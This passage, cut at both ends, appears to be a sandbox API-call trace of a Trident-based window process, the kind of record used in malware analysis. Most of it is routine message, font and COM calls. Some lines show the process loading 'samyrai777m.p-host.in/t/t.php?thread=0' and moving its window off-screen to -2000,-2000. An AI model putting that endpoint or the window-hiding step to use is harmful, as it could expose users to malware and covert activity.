hProcess=0x4dc)) returned 1
[0067.458] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0067.458] KillTimer (hWnd=0x10208, uIDEvent=0x1008) returned 1
[0067.458] GetCurrentThreadId () returned 0xbcc
[0067.554] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x14d780*=0x4dc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0067.797] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 0
[0067.811] GetParent (hWnd=0x10208) returned 0x10200
[0067.811] GetParent (hWnd=0x10200) returned 0x101fc
[0067.812] GetParent (hWnd=0x101fc) returned 0x0
[0067.812] PostMessageW (hWnd=0x10208, Msg=0x491, wParam=0x0, lParam=0x0) returned 1
[0067.812] GetMessageTime () returned 131555
[0067.812] GetMessagePos () returned 0x1a602d4
[0067.812] GetCursorPos (in: lpPoint=0x14ce70 | out: lpPoint=0x14ce70*(x=724, y=422)) returned 1
[0067.812] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14ce70 | out: lpPoint=0x14ce70) returned 1
[0067.812] GetKeyState (nVirtKey=16) returned 0
[0067.812] GetKeyState (nVirtKey=17) returned 0
[0067.812] GetKeyState (nVirtKey=18) returned 0
[0067.812] GetKeyState (nVirtKey=160) returned 0
[0067.812] GetKeyState (nVirtKey=162) returned 0
[0067.812] GetKeyState (nVirtKey=164) returned 0
[0067.812] GetCursorPos (in: lpPoint=0x14ce70 | out: lpPoint=0x14ce70*(x=724, y=422)) returned 1
[0067.812] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14ce70 | out: lpPoint=0x14ce70) returned 1
[0067.812] GetKeyState (nVirtKey=16) returned 0
[0067.812] GetKeyState (nVirtKey=17) returned 0
[0067.812] GetKeyState (nVirtKey=18) returned 0
[0067.812] GetKeyState (nVirtKey=160) returned 0
[0067.812] GetKeyState (nVirtKey=162) returned 0
[0067.812] GetKeyState (nVirtKey=164) returned 0
[0067.812] GetCapture () returned 0x0
[0067.812] GetCurrentThreadId () returned 0xbcc
[0067.812] GetCurrentThreadId () returned 0xbcc
[0067.812] GetCurrentThreadId () returned 0xbcc
[0067.812] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x14d210 | out: plResult=0x14d210) returned 0x1
[0067.812] NtdllDefWindowProc_W () returned 0x0
[0067.812] GetCurrentThreadId () returned 0xbcc
[0067.813] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0067.813] GetKeyState (nVirtKey=1) returned 0
[0067.813] GetKeyState (nVirtKey=2) returned 0
[0067.813] GetKeyState (nVirtKey=16) returned 0
[0067.813] GetKeyState (nVirtKey=17) returned 0
[0067.813] GetKeyState (nVirtKey=4) returned 0
[0067.813] GetKeyState (nVirtKey=18) returned 0
[0067.813] GetMessageTime () returned 131555
[0067.813] GetMessagePos () returned 0x1a602d4
[0067.813] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x14ca90 | out: plResult=0x14ca90) returned 0x0
[0067.813] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0067.813] GetKeyState (nVirtKey=1) returned 0
[0067.813] GetKeyState (nVirtKey=2) returned 0
[0067.813] GetKeyState (nVirtKey=16) returned 0
[0067.813] GetKeyState (nVirtKey=17) returned 0
[0067.813] GetKeyState (nVirtKey=4) returned 0
[0067.813] GetKeyState (nVirtKey=18) returned 0
[0067.813] GetMessageTime () returned 131555
[0067.813] GetMessagePos () returned 0x1a602d4
[0067.813] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x14c0f0 | out: plResult=0x14c0f0) returned 0x0
[0067.813] SetTimer (hWnd=0x10208, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0067.813] GetCurrentThreadId () returned 0xbcc
[0067.813] GetCurrentThreadId () returned 0xbcc
[0067.813] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x14d780*=0x4dc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0067.813] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 1
[0067.813] TranslateMessage (lpMsg=0x14d740) returned 0
[0067.813] DispatchMessageA (lpMsg=0x14d740) returned 0x0
[0067.813] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0067.813] GetAncestor (hwnd=0x10208, gaFlags=0x2) returned 0x10200
[0067.813] IsIconic (hWnd=0x10200) returned 0
[0067.813] GetCurrentThreadId () returned 0xbcc
[0067.814] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 0
[0067.814] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x14d780*=0x4dc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0067.913] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 1
[0067.913] TranslateMessage (lpMsg=0x14d740) returned 0
[0067.913] DispatchMessageA (lpMsg=0x14d740) returned 0x0
[0067.913] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0067.913] KillTimer (hWnd=0x10208, uIDEvent=0x1000) returned 1
[0067.913] GetCurrentThreadId () returned 0xbcc
[0067.913] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 0
[0067.913] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x14d780*=0x4dc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0068.167] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 1
[0068.167] TranslateMessage (lpMsg=0x14d740) returned 0
[0068.167] DispatchMessageA (lpMsg=0x14d740) returned 0x0
[0068.169] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 0
[0068.169] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x14d780*=0x4dc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0076.660] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 1
[0076.664] TranslateMessage (lpMsg=0x14d740) returned 0
[0076.664] DispatchMessageA (lpMsg=0x14d740) returned 0x0
[0076.664] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 1
[0076.664] TranslateMessage (lpMsg=0x14d740) returned 0
[0076.664] DispatchMessageA (lpMsg=0x14d740)
[0076.664] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 0
[0076.664] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x14d780*=0x4dc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x1
[0076.666] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 1
[0076.666] TranslateMessage (lpMsg=0x14d740) returned 0
[0076.666] DispatchMessageA (lpMsg=0x14d740) returned 0x0
[0076.666] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 1
[0076.666] TranslateMessage (lpMsg=0x14d740) returned 0
[0076.666] DispatchMessageA (lpMsg=0x14d740)
[0076.666] PeekMessageA (in: lpMsg=0x14d740, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x14d740) returned 0
[0076.666] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x14d780*=0x4dc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
[0083.803] GetExitCodeProcess (in: hProcess=0x4dc, lpExitCode=0x14d7b0 | out: lpExitCode=0x14d7b0*=0x0) returned 1
[0083.803] CloseHandle (hObject=0x4dc) returned 1
[0083.803] IUnknown:Release (This=0x398850) returned 0x1
[0083.804] GetCurrentThreadId () returned 0xbcc
[0083.804] _wcsicmp (_String1="window", _String2="window") returned 0
[0083.804] GetCurrentThreadId () returned 0xbcc
[0083.804] GetCurrentThreadId () returned 0xbcc
[0083.804] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.804] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.804] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.804] GetCurrentThreadId () returned 0xbcc
[0083.804] _wcsicmp (_String1="window", _String2="window") returned 0
[0083.804] GetCurrentThreadId () returned 0xbcc
[0083.804] GetCurrentThreadId () returned 0xbcc
[0083.804] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.804] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.805] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0083.805] GetCurrentThreadId () returned 0xbcc
[0083.805] GetCurrentThreadId () returned 0xbcc
[0083.805] ISystemDebugEventFire:IsActive (This=0x362500) returned 0x1
[0083.805] GetCurrentThreadId () returned 0xbcc
[0083.805] GetCurrentThreadId () returned 0xbcc
[0083.805] GetCurrentThreadId () returned 0xbcc
[0083.805] GetCurrentThreadId () returned 0xbcc
[0083.805] GetCurrentThreadId () returned 0xbcc
[0083.806] GetTickCount () returned 0x240e6
[0083.806] GetCurrentThreadId () returned 0xbcc
[0083.806] SetEvent (hEvent=0x210) returned 1
[0083.806] Sleep (dwMilliseconds=0x0)
[0083.813] GetTickCount () returned 0x240f5
[0083.813] GetCurrentThreadId () returned 0xbcc
[0083.814] GetSystemDefaultLCID () returned 0x409
[0083.814] GetVersionExW (in: lpVersionInformation=0x14ef90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x1b12304, dwBuildNumber=0x0, dwPlatformId=0x3b654c0, szCSDVersion="") | out: lpVersionInformation=0x14ef90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0083.814] GetKeyboardLayoutList (in: nBuff=32, lpList=0x14ee90 | out: lpList=0x14ee90) returned 1
[0083.814] GetSystemMetrics (nIndex=4096) returned 0
[0083.814] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0ca
[0083.814] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0af
[0083.814] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b2
[0083.814] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c5
[0083.814] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c6
[0083.814] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c4
[0083.814] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc077
[0083.814] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0ce
[0084.392] RedrawWindow (hWnd=0x10208, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1
[0084.392] GetTickCount () returned 0x24134
[0084.393] IUnknown:Release (This=0x30e180) returned 0x11
[0084.393] IUnknown:Release (This=0x324ce0) returned 0x3
[0084.393] IUnknown:Release (This=0x30e180) returned 0x10
[0084.393] IUnknown:Release (This=0x30e180) returned 0xf
[0084.393] IUnknown:Release (This=0x324ce0) returned 0x2
[0084.393] IUnknown:Release (This=0x30e180) returned 0xe
[0084.394] IUnknown:Release (This=0x30e180) returned 0xd
[0084.394] IUnknown:Release (This=0x30e180) returned 0xc
[0084.394] IUnknown:Release (This=0x30e180) returned 0xb
[0084.394] IUnknown:Release (This=0x355f00) returned 0x1
[0084.394] IUnknown:Release (This=0x355f00) returned 0x0
[0084.394] IUnknown:Release (This=0x30e180) returned 0x8
[0084.394] IUnknown:Release (This=0x30e180) returned 0x7
[0084.394] IUnknown:Release (This=0x30e180) returned 0x6
[0084.394] GetTickCount () returned 0x24134
[0084.394] GetCurrentThreadId () returned 0xbcc
[0084.394] GetCurrentThreadId () returned 0xbcc
[0084.394] GetCurrentThreadId () returned 0xbcc
[0084.417] EnumFontsW (hdc=0x7c01077d, lpLogfont="Times New Roman", lpProc=0x7fee08ee8b0, lParam=0x14dc90) returned 1
[0084.418] CreateFontIndirectW (lplf=0x14dc00) returned 0x20a0920
[0084.418] SelectObject (hdc=0x7c01077d, h=0x20a0920) returned 0x18a002e
[0084.418] GetTextMetricsW (in: hdc=0x7c01077d, lptm=0x14daf0 | out: lptm=0x14daf0) returned 1
[0084.419] GetOutlineTextMetricsW (in: hdc=0x7c01077d, cjCopy=0xe8, potm=0x14d9c0 | out: potm=0x14d9c0) returned 0xe8
[0084.419] SelectObject (hdc=0x7c01077d, h=0x18a002e) returned 0x20a0920
[0084.419] SelectObject (hdc=0x7c01077d, h=0x20a0920) returned 0x18a002e
[0084.419] GetTextFaceW (in: hdc=0x7c01077d, c=32, lpName=0x14dd20 | out: lpName="Times New Roman") returned 16
[0084.419] SelectObject (hdc=0x7c01077d, h=0x18a002e) returned 0x20a0920
[0084.419] SelectObject (hdc=0x7c01077d, h=0x20a0920) returned 0x18a002e
[0084.419] GetTextCharsetInfo (in: hdc=0x7c01077d, lpSig=0x14dc40, dwFlags=0x0 | out: lpSig=0x14dc40) returned 0
[0084.419] SelectObject (hdc=0x7c01077d, h=0x18a002e) returned 0x20a0920
[0084.419] SelectObject (hdc=0x7c01077d, h=0x20a0920) returned 0x18a002e
[0084.419] GetFontUnicodeRanges (in: hdc=0x7c01077d, lpgs=0x0 | out: lpgs=0x0) returned 0x27c
[0084.419] GetFontUnicodeRanges (in: hdc=0x7c01077d, lpgs=0x3ca940 | out: lpgs=0x3ca940) returned 0x27c
[0084.419] SelectObject (hdc=0x7c01077d, h=0x18a002e) returned 0x20a0920
[0084.419] SelectObject (hdc=0x7c01077d, h=0x20a0920) returned 0x18a002e
[0084.419] GetCharWidth32W (in: hdc=0x7c01077d, iFirst=0x20, iLast=0x7e, lpBuffer=0x14dcd0 | out: lpBuffer=0x14dcd0) returned 1
[0084.420] SelectObject (hdc=0x7c01077d, h=0x18a002e) returned 0x20a0920
[0084.426] LsQueryLineDup () returned 0x0
[0084.427] IntersectRect (in: lprcDst=0x14ee70, lprcSrc1=0x14ee70, lprcSrc2=0x14ee40 | out: lprcDst=0x14ee70) returned 1
[0084.427] IntersectRect (in: lprcDst=0x374fc0, lprcSrc1=0x374fc0, lprcSrc2=0x14ee60 | out: lprcDst=0x374fc0) returned 1
[0084.428] UnionRect (in: lprcDst=0x14f4b0, lprcSrc1=0x14f4b0, lprcSrc2=0x14f440 | out: lprcDst=0x14f4b0) returned 1
[0084.428] RedrawWindow (hWnd=0x10208, lprcUpdate=0x14f5d0, hrgnUpdate=0x0, flags=0x21) returned 1
[0084.428] EnumChildWindows (hWndParent=0x10208, lpEnumFunc=0x7fee09de450, lParam=0x14f400) returned 0
[0084.428] EnumChildWindows (hWndParent=0x10208, lpEnumFunc=0x7fee09de450, lParam=0x14f030) returned 0
[0084.428] GetCursorPos (in: lpPoint=0x14f060 | out: lpPoint=0x14f060*(x=631, y=286)) returned 1
[0084.428] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14f060 | out: lpPoint=0x14f060) returned 1
[0084.428] GetKeyState (nVirtKey=16) returned 0
[0084.428] GetKeyState (nVirtKey=17) returned 0
[0084.428] GetKeyState (nVirtKey=18) returned 0
[0084.428] GetKeyState (nVirtKey=160) returned 0
[0084.428] GetKeyState (nVirtKey=162) returned 0
[0084.428] GetKeyState (nVirtKey=164) returned 0
[0084.428] GetCapture () returned 0x0
[0084.428] GetCurrentThreadId () returned 0xbcc
[0084.428] GetCurrentThreadId () returned 0xbcc
[0084.428] GetCurrentThreadId () returned 0xbcc
[0084.428] GetFocus () returned 0x0
[0084.428] EnumChildWindows (hWndParent=0x10208, lpEnumFunc=0x7fee09de450, lParam=0x14f030) returned 0
[0084.428] GetCursorPos (in: lpPoint=0x14f060 | out: lpPoint=0x14f060*(x=631, y=286)) returned 1
[0084.428] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14f060 | out: lpPoint=0x14f060) returned 1
[0084.428] GetKeyState (nVirtKey=16) returned 0
[0084.428] GetKeyState (nVirtKey=17) returned 0
[0084.428] GetKeyState (nVirtKey=18) returned 0
[0084.428] GetKeyState (nVirtKey=160) returned 0
[0084.428] GetKeyState (nVirtKey=162) returned 0
[0084.428] GetKeyState (nVirtKey=164) returned 0
[0084.429] GetCurrentThreadId () returned 0xbcc
[0084.429] GetCurrentThreadId () returned 0xbcc
[0084.429] GetCurrentThreadId () returned 0xbcc
[0084.429] EnumChildWindows (hWndParent=0x10208, lpEnumFunc=0x7fee09de450, lParam=0x14f030) returned 0
[0084.429] GetCursorPos (in: lpPoint=0x14f060 | out: lpPoint=0x14f060*(x=631, y=286)) returned 1
[0084.429] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14f060 | out: lpPoint=0x14f060) returned 1
[0084.429] GetKeyState (nVirtKey=16) returned 0
[0084.429] GetKeyState (nVirtKey=17) returned 0
[0084.429] GetKeyState (nVirtKey=18) returned 0
[0084.429] GetKeyState (nVirtKey=160) returned 0
[0084.429] GetKeyState (nVirtKey=162) returned 0
[0084.429] GetKeyState (nVirtKey=164) returned 0
[0084.429] GetCapture () returned 0x0
[0084.429] GetCurrentThreadId () returned 0xbcc
[0084.429] GetCurrentThreadId () returned 0xbcc
[0084.429] GetCurrentThreadId () returned 0xbcc
[0084.429] GetCursorPos (in: lpPoint=0x14f060 | out: lpPoint=0x14f060*(x=631, y=286)) returned 1
[0084.429] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14f060 | out: lpPoint=0x14f060) returned 1
[0084.429] GetKeyState (nVirtKey=16) returned 0
[0084.429] GetKeyState (nVirtKey=17) returned 0
[0084.429] GetKeyState (nVirtKey=18) returned 0
[0084.429] GetKeyState (nVirtKey=160) returned 0
[0084.429] GetKeyState (nVirtKey=162) returned 0
[0084.429] GetKeyState (nVirtKey=164) returned 0
[0084.429] GetCurrentThreadId () returned 0xbcc
[0084.429] GetCurrentThreadId () returned 0xbcc
[0084.429] GetCurrentThreadId () returned 0xbcc
[0084.429] GetCursorPos (in: lpPoint=0x14f060 | out: lpPoint=0x14f060*(x=631, y=286)) returned 1
[0084.429] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14f060 | out: lpPoint=0x14f060) returned 1
[0084.429] GetKeyState (nVirtKey=16) returned 0
[0084.429] GetKeyState (nVirtKey=17) returned 0
[0084.429] GetKeyState (nVirtKey=18) returned 0
[0084.429] GetKeyState (nVirtKey=160) returned 0
[0084.429] GetKeyState (nVirtKey=162) returned 0
[0084.429] GetKeyState (nVirtKey=164) returned 0
[0084.430] GetCurrentThreadId () returned 0xbcc
[0084.430] GetCurrentThreadId () returned 0xbcc
[0084.430] GetCurrentThreadId () returned 0xbcc
[0084.430] GetCurrentThreadId () returned 0xbcc
[0084.430] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x14f590 | out: ppu=0x14f590) returned 0x0
[0084.430] IUnknown:AddRef (This=0x30e180) returned 0x7
[0084.430] IUri:GetAbsoluteUri (in: This=0x30e180, pbstrAbsoluteUri=0x14f678 | out: pbstrAbsoluteUri=0x14f678*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0084.430] IUnknown:Release (This=0x30e180) returned 0x6
[0084.430] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x7fefde70000
[0084.430] GetProcAddress (hModule=0x7fefde70000, lpProcName="VariantClear") returned 0x7fefde71180
[0084.430] ShouldShowIntranetWarningSecband () returned 0x0
[0084.479] GetIUriPriv () returned 0x0
[0084.479] IUnknown:Release (This=0x30e180) returned 0x6
[0084.479] GetCursorPos (in: lpPoint=0x14f330 | out: lpPoint=0x14f330*(x=791, y=286)) returned 1
[0084.479] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14f330 | out: lpPoint=0x14f330) returned 1
[0084.479] GetKeyState (nVirtKey=16) returned 0
[0084.498] GetKeyState (nVirtKey=17) returned 0
[0084.498] GetKeyState (nVirtKey=18) returned 0
[0084.498] GetKeyState (nVirtKey=160) returned 0
[0084.498] GetKeyState (nVirtKey=162) returned 0
[0084.498] GetKeyState (nVirtKey=164) returned 0
[0084.499] IUnknown:AddRef (This=0x30e180) returned 0x7
[0084.499] IUri:GetScheme (in: This=0x30e180, pdwScheme=0x14e5c8 | out: pdwScheme=0x14e5c8*=0x2) returned 0x0
[0084.499] IUri:GetDisplayUri (in: This=0x30e180, pbstrDisplayString=0x14e5f0 | out: pbstrDisplayString=0x14e5f0*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0084.499] GetWindowTextW (in: hWnd=0x10200, lpString=0x14e140, nMaxCount=512 | out: lpString="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 49
[0084.499] IUnknown:Release (This=0x30e180) returned 0x6
[0084.499] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0084.499] SendMessageW (hWnd=0x101fc, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0084.500] SendMessageW (hWnd=0x10200, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0
[0084.500] SetWindowLongW (hWnd=0x10200, nIndex=-16, dwNewLong=-2100363264) returned -2033254400
[0084.500] SetWindowLongW (hWnd=0x10200, nIndex=-20, dwNewLong=262144) returned 262400
[0084.501] SetWindowPos (hWnd=0x10200, hWndInsertAfter=0xfffffffffffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0084.501] GlobalAddAtomW (lpString=0x0) returned 0x0
[0084.501] SetPropW (hWnd=0x101fc, lpString=0x0, hData=0x101fc) returned 0
[0084.501] SetWindowPos (hWnd=0x10200, hWndInsertAfter=0x0, X=-2000, Y=-2000, cx=0, cy=0, uFlags=0x15) returned 1
[0084.502] SetWindowPos (hWnd=0x10200, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x16)
[0084.502] GetClientRect (in: hWnd=0x10200, lpRect=0x14e9b0 | out: lpRect=0x14e9b0) returned 1
[0084.502] GetClientRect (in: hWnd=0x10200, lpRect=0x14e9e0 | out: lpRect=0x14e9e0) returned 1
[0084.502] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x46, wParam=0x0, lParam=0x14e760*=66056, plResult=0x14e550 | out: plResult=0x14e550) returned 0x1
[0084.502] NtdllDefWindowProc_W () returned 0x0
[0084.502] GetCurrentThreadId () returned 0xbcc
[0084.502] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.502] GetCurrentThreadId () returned 0xbcc
[0084.502] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.502] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x47, wParam=0x0, lParam=0x14e760*=66056, plResult=0x14e550 | out: plResult=0x14e550) returned 0x1
[0084.502] NtdllDefWindowProc_W () returned 0x0
[0084.502] GetCurrentThreadId () returned 0xbcc
[0084.502] CreateRectRgnIndirect (lprect=0x7fee0f5a200) returned 0x2b040260
[0084.502] GetUpdateRgn (hWnd=0x10208, hRgn=0x2b040260, bErase=0) returned 1
[0084.502] DeleteObject (ho=0x2b040260) returned 1
[0084.502] SetWindowPos (hWnd=0x10208, hWndInsertAfter=0x0, X=0, Y=0, cx=116, cy=0, uFlags=0x14) returned 1
[0084.502] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.502] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x46, wParam=0x0, lParam=0x14e850*=66056, plResult=0x14e640 | out: plResult=0x14e640) returned 0x1
[0084.502] NtdllDefWindowProc_W () returned 0x0
[0084.502] GetCurrentThreadId () returned 0xbcc
[0084.503] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.503] GetCurrentThreadId () returned 0xbcc
[0084.503] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.503] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x47, wParam=0x0, lParam=0x14e850*=66056, plResult=0x14e640 | out: plResult=0x14e640) returned 0x1
[0084.503] NtdllDefWindowProc_W () returned 0x0
[0084.503] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.503] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x5, wParam=0x0, lParam=0x74, plResult=0x14df90 | out: plResult=0x14df90) returned 0x1
[0084.503] NtdllDefWindowProc_W () returned 0x0
[0084.503] GetCurrentThreadId () returned 0xbcc
[0084.503] GetCurrentThreadId () returned 0xbcc
[0084.503] GetCurrentThreadId () returned 0xbcc
[0084.503] ShowWindow (hWnd=0x10200, nCmdShow=1) returned 0
[0084.504] GetFocus () returned 0x0
[0084.504] SetFocus (hWnd=0x10208) returned 0x0
[0084.504] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.504] GetKeyState (nVirtKey=1) returned 1
[0084.504] GetKeyState (nVirtKey=2) returned 0
[0084.504] GetKeyState (nVirtKey=16) returned 0
[0084.504] GetKeyState (nVirtKey=17) returned 0
[0084.504] GetKeyState (nVirtKey=4) returned 0
[0084.504] GetKeyState (nVirtKey=18) returned 0
[0084.504] GetMessageTime () returned 140650
[0084.505] GetMessagePos () returned 0x20202af
[0084.505] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x14e180 | out: plResult=0x14e180) returned 0x0
[0084.505] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.505] GetKeyState (nVirtKey=1) returned 1
[0084.505] GetKeyState (nVirtKey=2) returned 0
[0084.505] GetKeyState (nVirtKey=16) returned 0
[0084.505] GetKeyState (nVirtKey=17) returned 0
[0084.505] GetKeyState (nVirtKey=4) returned 0
[0084.505] GetKeyState (nVirtKey=18) returned 0
[0084.505] GetMessageTime () returned 140650
[0084.505] GetMessagePos () returned 0x20202af
[0084.505] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x14d7e0 | out: plResult=0x14d7e0) returned 0x0
[0084.505] SetTimer (hWnd=0x10208, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000
[0084.505] GetCurrentThreadId () returned 0xbcc
[0084.505] GetCurrentThreadId () returned 0xbcc
[0084.505] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0084.505] GetMessageTime () returned 140650
[0084.505] GetMessagePos () returned 0x20202af
[0084.505] GetCursorPos (in: lpPoint=0x14e560 | out: lpPoint=0x14e560*(x=791, y=286)) returned 1
[0084.505] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14e560 | out: lpPoint=0x14e560) returned 1
[0084.505] GetKeyState (nVirtKey=16) returned 0
[0084.505] GetKeyState (nVirtKey=17) returned 0
[0084.505] GetKeyState (nVirtKey=18) returned 0
[0084.505] GetKeyState (nVirtKey=160) returned 0
[0084.505] GetKeyState (nVirtKey=162) returned 0
[0084.505] GetKeyState (nVirtKey=164) returned 0
[0084.506] GetCursorPos (in: lpPoint=0x14e560 | out: lpPoint=0x14e560*(x=791, y=286)) returned 1
[0084.506] ScreenToClient (in: hWnd=0x10208, lpPoint=0x14e560 | out: lpPoint=0x14e560) returned 1
[0084.506] GetKeyState (nVirtKey=16) returned 0
[0084.506] GetKeyState (nVirtKey=17) returned 0
[0084.506] GetKeyState (nVirtKey=18) returned 0
